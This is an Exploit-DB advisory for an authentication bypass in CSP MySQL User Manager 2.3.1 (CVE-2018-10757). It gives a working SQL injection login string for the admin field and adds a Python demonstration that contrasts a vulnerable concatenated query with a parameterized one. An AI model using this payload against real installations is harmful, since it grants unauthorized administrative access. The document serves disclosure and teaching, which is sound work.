CSP MySQL User Manager 2.3.1 – Authentication Bypass

  • Author: Youssef Mami
    Date: 2018-05-06
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/44589/
  • # Exploit Title: CSP MySQL User Manager 2.3.1 - Authentication Bypass
    # Date: 2018-05-04
    # Exploit Author: Youssef mami
    # Vendor Homepage: https://code.google.com/archive/p/cspmum/
    # Software Link: https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/cspmum/cmum-231.zip
    # Version: 2.3.1
    # Tested on: Linux 2.6.38-11
    # CVE : CVE-2018-10757
    
    ##################################################################################
    SQL Injection Authentication Bypass
    Product Page: https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/cspmum/cmum-231.zip
     
    Author(Pentester): Youssef mami (contact@hammamet-services.com)
    On Web: www.hammamet-services.com and http://hiservices.blogspot.com ( our blog )
    On Social: www.facebook.com/hammamet.informatique and https://twitter.com/hammamet_info
    ##################################################################################
    We just need to enter the admin login like this: admin' or ' 1=1-- and any password :-)
    login : admin' or ' 1=1--
    password: hammamet informatique services
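
Why the login string above gets past a concatenated query, and how bound parameters stop it, as an added example that is not code from the advisory or from the cmum project. The query shape, the `users` table and its columns are assumptions, and SQLite stands in for MySQL so the block runs offline.

```python
import hashlib
import sqlite3

PAYLOAD = "admin' or ' 1=1--"  # login value quoted in the advisory


def pw_hash(password: str) -> str:
    # Constructed demo hashing with a fixed salt; not the application's scheme.
    return hashlib.pbkdf2_hmac("sha256", password.encode(), b"demo-salt", 100_000).hex()


def make_db() -> sqlite3.Connection:
    # Constructed sample data; table and column names are hypothetical.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (login TEXT PRIMARY KEY, pw_hash TEXT NOT NULL)")
    db.execute("INSERT INTO users VALUES (?, ?)", ("admin", pw_hash("correct horse")))
    return db


def login_concatenated(db: sqlite3.Connection, login: str, password: str) -> bool:
    # Vulnerable pattern: the login value becomes part of the SQL text.
    # With PAYLOAD the WHERE clause parses as
    #   login = 'admin' OR (' 1=1--' AND pw_hash = '...')
    # AND binds tighter than OR, so the password check no longer gates the row.
    sql = ("SELECT login FROM users WHERE login = '" + login +
           "' AND pw_hash = '" + pw_hash(password) + "'")
    return db.execute(sql).fetchone() is not None


def login_parameterized(db: sqlite3.Connection, login: str, password: str) -> bool:
    # Hardened pattern: values are bound as data and never parsed as SQL,
    # so PAYLOAD is just a login name that matches no row.
    sql = "SELECT login FROM users WHERE login = ? AND pw_hash = ?"
    return db.execute(sql, (login, pw_hash(password))).fetchone() is not None


if __name__ == "__main__":
    db = make_db()
    for name, check in (("concatenated", login_concatenated),
                        ("parameterized", login_parameterized)):
        print(name, "accepts payload:", check(db, PAYLOAD, "any password"))
```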